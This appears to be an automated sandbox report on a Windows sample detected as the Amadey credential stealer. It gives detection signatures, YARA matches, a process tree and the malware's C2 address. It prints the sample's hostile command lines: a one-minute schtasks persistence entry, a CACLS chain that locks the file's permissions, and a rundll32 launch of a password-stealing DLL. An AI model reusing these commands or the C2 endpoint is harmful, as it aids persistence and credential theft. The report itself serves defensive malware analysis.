Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	764030
MD5:	2365cd5930c2845769177b920d4b8ad6
SHA1:	1246c7f15b215bf1ecc70294434ccd19a1778daf
SHA256:	77bfc0f4bf45082fc3c52c3c10d4394d925c116fda4b3eda7f09151a57ad4010
Tags:	exe
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Amadeys stealer DLL

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Machine Learning detection for sample

Contains functionality to inject code into remote processes

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to steal Instant Messenger accounts or passwords

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Creates a DirectInput object (often for capturing keystrokes)

Drops PE files

Contains functionality to read the PEB

Uses cacls to modify the permissions of files

Contains functionality to launch a program with higher privileges

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 204 cmdline: C:\Users\user\Desktop\file.exe MD5: 2365CD5930C2845769177B920D4B8AD6)

gntuud.exe (PID: 3332 cmdline: "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" MD5: 2365CD5930C2845769177B920D4B8AD6)

schtasks.exe (PID: 1496 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5268 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\9c69749b54" /P "user:N"&&CACLS "..\9c69749b54" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1372 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 6060 cmdline: CACLS "gntuud.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 4692 cmdline: CACLS "gntuud.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cmd.exe (PID: 5256 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 5024 cmdline: CACLS "..\9c69749b54" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 1312 cmdline: CACLS "..\9c69749b54" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

rundll32.exe (PID: 1276 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

gntuud.exe (PID: 6036 cmdline: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe MD5: 2365CD5930C2845769177B920D4B8AD6)

cleanup

Malware Configuration

Threatname: Amadey

{"C2 url": "31.41.244.237/jg94cVd30f/index.php", "Version": "3.50"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll	INDICATOR_TOOL_PWS_Amady	Detects password stealer DLL. Dropped by Amadey	ditekSHen	0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb 0x190dc:$s4: \HostName 0x19104:$s5: \Password 0x17c08:$s6: SOFTWARE\RealVNC\ 0x17c34:$s6: SOFTWARE\RealVNC\ 0x17c60:$s6: SOFTWARE\RealVNC\ 0x17ca8:$s6: SOFTWARE\RealVNC\ 0x17cd4:$s6: SOFTWARE\RealVNC\ 0x1800c:$s7: SOFTWARE\TightVNC\ 0x18038:$s7: SOFTWARE\TightVNC\ 0x18064:$s7: SOFTWARE\TightVNC\ 0x180b0:$s7: SOFTWARE\TightVNC\ 0x1c43c:$s8: cred.dll
C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll	INDICATOR_TOOL_PWS_Amady	Detects password stealer DLL. Dropped by Amadey	ditekSHen	0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb 0x190dc:$s4: \HostName 0x19104:$s5: \Password 0x17c08:$s6: SOFTWARE\RealVNC\ 0x17c34:$s6: SOFTWARE\RealVNC\ 0x17c60:$s6: SOFTWARE\RealVNC\ 0x17ca8:$s6: SOFTWARE\RealVNC\ 0x17cd4:$s6: SOFTWARE\RealVNC\ 0x1800c:$s7: SOFTWARE\TightVNC\ 0x18038:$s7: SOFTWARE\TightVNC\ 0x18064:$s7: SOFTWARE\TightVNC\ 0x180b0:$s7: SOFTWARE\TightVNC\ 0x1c43c:$s8: cred.dll

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1640:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.311169503.0000000000650000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000002.385361747.000000000061B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x920:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000003.326614950.0000000002120000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000003.383588182.0000000000990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
8.3.gntuud.exe.990000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.5f0e67.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
8.2.gntuud.exe.950e67.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
8.2.gntuud.exe.400000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.3.gntuud.exe.2120000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.400000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
8.2.gntuud.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.3.file.exe.650000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.3.gntuud.exe.2120000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
8.2.gntuud.exe.950e67.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
8.3.gntuud.exe.990000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.5f0e67.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.3.file.exe.650000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 9 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: 31.41.244.237/jg94cVd30f/index.php	Avira URL Cloud: Label: malware
Source: http://31.41.244.237/jg94cVd30f/index.phpM	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll	Avira: detection malicious, Label: HEUR/AGEN.1233121
Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll	Avira: detection malicious, Label: HEUR/AGEN.1233121

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll	Virustotal: Detection: 76%	Perma Link
Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll	ReversingLabs: Detection: 88%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe

Joe Sandbox ML: detected

Source: 8.2.gntuud.exe.950e67.1.raw.unpack

Malware Configuration Extractor: Amadey {"C2 url": "31.41.244.237/jg94cVd30f/index.php", "Version": "3.50"}

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\lexakezuraj_yamimumowur45 rex.pdb source: file.exe, gntuud.exe.0.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: gntuud.exe, gntuud.exe, 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, gntuud.exe, 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, gntuud.exe, 00000008.00000003.383588182.0000000000990000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 2C:\lexakezuraj_yamimumowur45 rex.pdb source: file.exe, gntuud.exe.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00420C88 FindFirstFileExW,	0_2_00420C88
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_00420C88 FindFirstFileExW,	8_2_00420C88
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_00970EEF FindFirstFileExW,	8_2_00970EEF

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 31.41.244.237 80			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.4 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 31.41.244.237/jg94cVd30f/index.php

Source: Joe Sandbox View

ASN Name: AEROEXPRESS-ASRU AEROEXPRESS-ASRU

Source: Joe Sandbox View

IP Address: 31.41.244.237 31.41.244.237

Source: gntuud.exe, 00000001.00000003.359344808.00000000006A6000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: http://31.41.244.237/jg94cVd30f/index.phpM

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004041F0 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004041F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402C70 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,

0_2_00402C70

Source: file.exe, 00000000.00000002.314289798.00000000006D8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.385361747.000000000061B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, type: DROPPED	Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, type: DROPPED	Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.385361747.000000000061B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, type: DROPPED	Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, type: DROPPED	Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00429560	0_2_00429560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042857D	0_2_0042857D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004076A0	0_2_004076A0
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_00406F30	8_2_00406F30
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_00429560	8_2_00429560
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_0042857D	8_2_0042857D
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_009797C7	8_2_009797C7

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00418D20 appears 40 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00417040 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: String function: 00968F87 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: String function: 00418D20 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: String function: 00417040 appears 130 times

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe

Process Stats: CPU usage > 98%

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll C7D804E8FB096769B0E199102BDF8EFA97DFAE1A9B57A479819971146877368B

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe"
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y\|CACLS "..\9c69749b54" /P "user:N"&&CACLS "..\9c69749b54" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Main
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y\|CACLS "..\9c69749b54" /P "user:N"&&CACLS "..\9c69749b54" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:R" /E	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe

File created: C:\Users\user\AppData\Roaming\85f469ce401df1

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\9c69749b54

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@24/9@0/2

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006E466E CreateToolhelp32Snapshot,Module32First,

0_2_006E466E

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Main

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Mutant created: \Sessions\1\BaseNamedObjects\85f469ce401df19fc5a7f9408bc52f06
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_01

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\lexakezuraj_yamimumowur45 rex.pdb source: file.exe, gntuud.exe.0.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: gntuud.exe, gntuud.exe, 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, gntuud.exe, 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, gntuud.exe, 00000008.00000003.383588182.0000000000990000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 2C:\lexakezuraj_yamimumowur45 rex.pdb source: file.exe, gntuud.exe.0.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

